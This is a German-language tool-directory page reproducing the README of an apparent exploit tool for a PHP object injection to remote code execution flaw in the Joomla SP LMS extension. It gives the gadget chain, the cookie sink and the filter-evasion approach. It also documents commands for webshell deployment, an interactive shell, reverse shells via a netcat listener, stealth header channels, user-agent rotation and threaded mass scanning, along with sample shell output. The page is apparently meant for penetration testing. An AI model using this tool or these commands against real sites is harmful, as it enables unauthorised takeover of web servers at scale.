Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
SchwachstellenanalyseCode-AnalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
Payload-Entwicklung
Labs & Praxis
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Repository anzeigen
22vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-48909 - Nicht authentifizierte PHP-Objektinjektion zu RCE-Exploit für Joomla SP LMS-Erweiterung Versionen <= 4.1.3. Nutzt die Deserialisierung des lmsOrders-Cookies aus, um über die Joomla FormattedtextLogger-Gadget-Kette eine Webshell zu schreiben. Enthält interaktive Shell, Pfadfindung und Bereinigung. Nur für autorisierte Sicherheitstests.

Teilen

CVE-2026-48909

Joomla SP LMS — Nicht authentifizierte PHP-Objekt-Injektion → RCE

Python Version CVSS License Platform

Proof-of-Concept-Bewertungstool für CVE-2026-48909
Autor: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Nur für autorisierte Nutzung. Dieses Tool dient der Sicherheitsforschung, Bildung und dem Testen von Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zur Bewertung haben. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


Inhaltsverzeichnis

  • Übersicht
  • Schwachstellendetails
  • Funktionen
  • Installation
  • Schnellstart
  • Benutzerhandbuch
  • Befehlsreferenz
  • Payload-Typen
  • Angriffskette
  • Ausgabebeispiele
  • Fehlerbehebung
  • Repository-Struktur
  • Versionsverlauf
  • Haftungsausschluss
  • Autor

Übersicht

CVE-2026-48909 ist eine kritische nicht authentifizierte PHP-Objekt-Injektion in der Joomla SP LMS-Erweiterung. Dieses Tool implementiert die vollständige Angriffskette, damit Sicherheitsexperten die Auswirkungen in Labor- oder autorisierten Umgebungen validieren können.

Es umfasst Erkennung, Pfadfindung, Payload-Zustellung, interaktive Post-Exploitation (wo erlaubt), Massenbewertung und optionale Bereinigung.


Schwachstellendetails

AttributWert
CVE-IDCVE-2026-48909
CVSS9.5 (Kritisch)
AngriffsvektorNetzwerk – nicht authentifiziert
AuswirkungRemote-Code-Ausführung
Betroffenes ProduktJoomla SP LMS
Betroffene Versionen1.0.0 – 4.1.3
Gepatchte VersionSP LMS 4.1.4+
Gadget-KetteErfordert Joomla < 5.2.2

Kompatibilitätsmatrix

KomponenteVersionRCE
SP LMS< 4.1.4Anfällig
SP LMS≥ 4.1.4Gepatcht
Joomla< 5.2.2Gadget-Kette nutzbar
Joomla≥ 5.2.2Gadget-Kette gepatcht

Funktionen

Kern

FähigkeitBeschreibung
Nicht authentifizierter ExploitKeine Anmeldeinformationen erforderlich
Mehrere Payloads7 Webshell-/Ausführungsvarianten
Interaktive ShellSitzung mit Befehlsverlauf nach Bereitstellung
PfadfindungAutomatische Suche nach beschreibbaren Pfaden
BereinigungEntfernen der bereitgestellten Webshell nach Tests

Bewertung & Betrieb

FähigkeitBeschreibung
MassenscanMultithreaded Ziellisten (1000+)
Proxy-UnterstützungHTTP/SOCKS (Burp, ZAP, etc.)
Reverse ShellListener-basierte Payloads
Stealth-ModusHeader-/POST-orientierte Befehlskanäle
RandomisierungUUID-Shell-Namen, User-Agent-Rotation
BerichterstattungExport als JSON, HTML oder CSV
ErkennungshilfenJoomla-Versionsprüfungen, --check-only, --safe-mode

Hinweise zur Umgehung

  • Vermeidet nach Möglichkeit Zeichen, die von Joomlas cmd-Filter blockiert werden
  • Hex-codierter PHP-Schreibpfad, um Base64-Padding-/Schrägstrich-Probleme zu reduzieren
  • Konfigurierbare Verzögerungen und rotierende User-Agents
  • Wiederholungslogik über mehrere Injektions-/Pfadkandidaten

Installation

Voraussetzungen

  • Python 3.6+
  • pip
  • Netzwerkerreichbarkeit zu den zu testenden Ziel(en)

Einrichtung

root@kitploit:~
cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Abhängigkeiten

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

argparse ist Teil der Python-Standardbibliothek; es muss nicht über pip installiert werden.


Schnellstart

Ersetzen Sie https://target.example nur durch ein Labor- oder autorisiertes Ziel.

Einzelnes Ziel – Pfad finden + interaktive Shell

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Sichere Überprüfungen (keine Ausnutzung)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Massenscan

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Reverse Shell (autorisiertes Labor)

root@kitploit:~
# Listener
nc -lvnp 4444

# Exploit-Host
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Benutzerhandbuch

Pfadfindung

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Bekannter beschreibbarer Pfad

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Interaktive Sitzung

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Einmal-Befehl

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Stealth-Payload + interaktiv

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Proxy (Burp / ZAP)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Bereinigung

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Ziellistenformat

root@kitploit:~
https://lab-a.example
https://lab-b.example
https://lab-c.example
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Befehlsreferenz

Ziel

ArgumentBeschreibung
targetEinzelne Ziel-URL
--targets, -T DATEIDatei mit Zielen (eine URL pro Zeile)
--path PFADAbsoluter Serverpfad für Webshell
--shell-type TYPminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEWebshell-Dateiname (Standard: x.php)

Netzwerk

ArgumentBeschreibung
--timeout SEKUNDENRequest-Timeout (Standard: 15)
--insecureTLS-Zertifikatsprüfung überspringen
--proxy URLz.B. http://127.0.0.1:8080
--random-uaUser-Agent rotieren (standardmäßig aktiviert)
--delay SEKUNDENVerzögerung zwischen Requests

Reverse Shell

ArgumentBeschreibung
--reverse-host HOSTListener-Host
--reverse-port PORTListener-Port

Modi

ArgumentBeschreibung
--interactive, -iInteraktive Shell nach Bereitstellung
--check-onlyNur Schwachstellenprüfung
--safe-modeNicht-destruktives Testen
--find-pathBeschreibbaren Pfad automatisch erkennen
--cmd BEFEHLEinen Befehl ausführen und beenden
--cleanup PFADWebshell unter Pfad entfernen
--cleanup-afterBereinigung nach Exploitation

Massenscan / Bericht

ArgumentBeschreibung
--threads NUMWorker-Threads (Standard: 10)
--export DATEIAusgabepfad für Ergebnisse
--export-format FORMATjson, html, csv (Standard: json)

Protokollierung

ArgumentBeschreibung
--log-file DATEILogs in Datei schreiben
--quiet, -qLeiser Modus
--verbose, -vAusführliche Ausgabe
--no-bannerBanner ausblenden

Payload-Typen

TypVerhaltenTypische Verwendung
minimalKompakte GET-basierte AusführungEnger Platz / Schnelltest
standardGET + POST cmd (Standard)Allgemeine Bewertungen
stealthBefehl über X-Cmd-HeaderReduziert URL-Protokollierung
base64eval(base64_decode(...)) über POSTFilter-Umgehung im Labor
fullGET/POST + base64-KanalBreitere Kontrolle
reverseConnect-Back-ShellDauerhafter Laborzugang
blindshellAlternative Inklusions-/AusführungsmusterEingeschränkte Umgebungen
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type minimal --find-path
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path -i
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type reverse \
  --reverse-host 10.0.0.1 --reverse-port 4444 --find-path

Angriffskette

root@kitploit:~
flowchart TD
    A["Angreifer-kontrolliertes lmsOrders-Cookie"] --> B["unserialize() in cart.php"]
    B --> C["FormattedtextLogger::__destruct()"]
    C --> D["File::write() — PHP-Ablage"]
    D --> E["Webshell auf Disk"]
    E --> F["Remote-Befehlsausführung"]

Technische Zusammenfassung

  1. Sink — components/com_splms/models/cart.php deserialisiert ein base64-decodiertes lmsOrders-Cookie.
  2. Gadget — Joomla\CMS\Log\Logger\FormattedtextLogger::__destruct() löst einen Dateisystem-Schreibvorgang aus.
  3. Payload — PHP-Body hex-codiert, längenaufgefüllt, um gefilterte Base64-Zeichen (/, =, +) zu vermeiden.
  4. Ausführung — Das abgelegte Skript wird angefordert, um OS-Befehle auszuführen.

Eingabefilter-Umgehung (hohe Ebene)

Joomlas cmd-Filter kann /, = und + entfernen. Dieses Tool kompensiert dies durch:

  • Codierung des Schreibinhalts als Hex
  • Auffüllen serialisierter / base64-Formen, um illegale Zeichen zu vermeiden
  • Iterieren von Kandidaten, bis ein filtersicherer Payload erzeugt wird

Ausgabebeispiele

Interaktive Sitzung

root@kitploit:~
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell> whoami
www-data

shell> pwd
/var/www/html

shell> exit

JSON-Export (Struktur)

root@kitploit:~
{
  "timestamp": "2026-07-16T10:30:00.123456",
  "target": "https://lab.example",
  "shell_path": "/tmp/x_abc123def.php",
  "shell_url": "https://lab.example/tmp/x_abc123def.php",
  "shell_type": "standard",
  "vulnerable": true,
  "exploited": true,
  "joomla_version": "4.3.2",
  "detected_paths": [
    "/tmp/x_abc123def.php",
    "/images/x_abc123def.php",
    "/cache/x_abc123def.php"
  ],
  "author": "Sudeepa Wanigarathna",
  "tool_version": "3.0"
}

Einmal-Befehl

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Fehlerbehebung

SymptomWas zu tun ist
Konnte keinen filtersicheren Payload erzeugenAnderen --path oder --find-path verwenden; ungewöhnliche Pfadzeichen vermeiden
Shell-Verifizierung fehlgeschlagen--timeout erhöhen; --shell-type standard versuchen; system() o.ä. ist nicht deaktiviert? Beschreibbarkeit prüfen
Ziel scheint nicht anfälligSP LMS ≤ 4.1.3, Joomla < 5.2.2, com_splms vorhanden; WAF-Blockierungen überprüfen
HTTP 500--insecure, --timeout 30, Anwendungs-/Serverlogs prüfen
Proxy-Verbindung abgelehntProxy läuft? URL-Schema/Host/Port korrekt
TLS-Verifizierung fehlgeschlagen--insecure für Labor-Endpunkte mit defekten Zertifikaten hinzufügen

Debug-Workflow

root@kitploit:~
# Ausführlich + Dateilog
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path -v --log-file debug.log

# Durch Burp
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path \
  --proxy http://127.0.0.1:8080 --insecure -v

# Zuerst nicht-destruktiv
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Repository-Struktur

root@kitploit:~
exploit/
├── CVE-2026-48909 v3.0.py   # Haupttool (v3.0)
├── requirements.txt         # Python-Abhängigkeiten
├── README.md                # Diese Datei
└── venv/                    # Lokales virtualenv (optional, nicht eingecheckt)

Optionale Ergänzungen für eine öffentliche Veröffentlichung:

root@kitploit:~
targets.txt.example
docs/technical-details.md
examples/basic-exploit.sh
examples/mass-scan.sh

Versionsverlauf

v3.0.0 — Ultimate Edition (Juli 2026)

  • Massenscan mit Threading
  • HTTP/SOCKS-Proxy-Unterstützung
  • Reverse-Shell-Payloads
  • WAF-orientierte Umgehungshilfen
  • Interaktive Stealth-Shell
  • Optionen zur automatischen Bereinigung
  • JSON / HTML / CSV-Berichterstattung
  • Erweiterte Liste beschreibbarer Pfade
  • Joomla-Versionserkennungshilfen
  • Safe-Modus und User-Agent-Rotation
  • Konfigurierbare Request-Verzögerungen

v2.1 — Professional Edition (Juli 2026)

  • Payload-Erzeugungsfehler behoben
  • Stärkere Fehlerbehandlung und Protokollierung

Haftungsausschluss

Dieses Projekt wird wie besehen für defensive Sicherheitsforschung und autorisierte Penetrationstests bereitgestellt.

Durch die Nutzung dieser Software stimmen Sie zu, dass:

  1. Sie nur Systeme angreifen, die Sie besitzen oder für die Sie ausdrücklich autorisiert sind.
  2. Sie die geltenden Gesetze zu Computerbetrug und Datenschutz verstehen.
  3. Der Autor und die Mitwirkenden nicht verantwortlich sind für Schäden, Datenverlust oder rechtliche Konsequenzen aus Missbrauch.

Wenn Sie diese Schwachstelle in freier Wildbahn entdecken, befolgen Sie verantwortungsvolle Offenlegungspraktiken und stimmen Sie sich gegebenenfalls mit dem Anbieter / CERT ab.


Autor

Sudeepa Wanigarathna
Sicherheitsforscher · Ethisches Hacking · Schwachstellenforschung · Python-Werkzeuge


Unterstützung

  • Sternen Sie das Repository, wenn es Ihrer Forschung hilft
  • Öffnen Sie Issues für Fehler oder False Positives
  • Pull-Requests für Dokumentation, Erkennungsgenauigkeit und autorisierte Labor-UX willkommen

Nur für autorisierte Sicherheitstests.

Tool herunterladen